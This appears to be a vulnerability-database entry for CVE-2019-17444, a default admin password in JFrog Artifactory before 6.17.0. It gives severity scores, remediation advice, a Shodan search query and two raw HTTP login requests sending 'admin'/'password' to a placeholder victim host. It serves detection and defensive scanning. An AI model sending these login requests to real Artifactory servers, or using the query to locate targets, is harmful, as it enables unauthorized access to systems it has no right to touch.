🔙 목록으로 돌아가기

CVE-2019-17444: Jfrog Artifactory <6.17.0 - Default Admin Password

TitleJfrog Artifactory <6.17.0 - Default Admin Password
Authorpdteam
SeverityCritical
ImpactAn attacker can gain unauthorized access to the Jfrog Artifactory instance.
RemediationUpgrade Jfrog Artifactory to version 6.17.0 or later and change the default admin password to a strong, unique one.
CVSS Score9.8
EPSS Score0.92338
CVE IDCVE-2019-17444
CWE IDCWE-521
Shodan Querycpe:"cpe:2.3:a:jfrog:artifactory"
Tags cve cve2019 jfrog default-login - vuln

🔍 Vulnerability Description

Jfrog Artifactory prior to 6.17.0 uses default passwords (such as “password”) for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.

🌐 HTTP Request

POST /artifactory/ui/auth/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Content-Length: 53
Content-Type: application/json;charset=UTF-8
Origin: /
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
Connection: close

{"user":"admin","password":"password","type":"login"}
POST /ui/auth/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
Content-Length: 53
Content-Type: application/json;charset=UTF-8
Origin: /
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
Connection: close

{"user":"admin","password":"password","type":"login"}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17444.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-17444.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A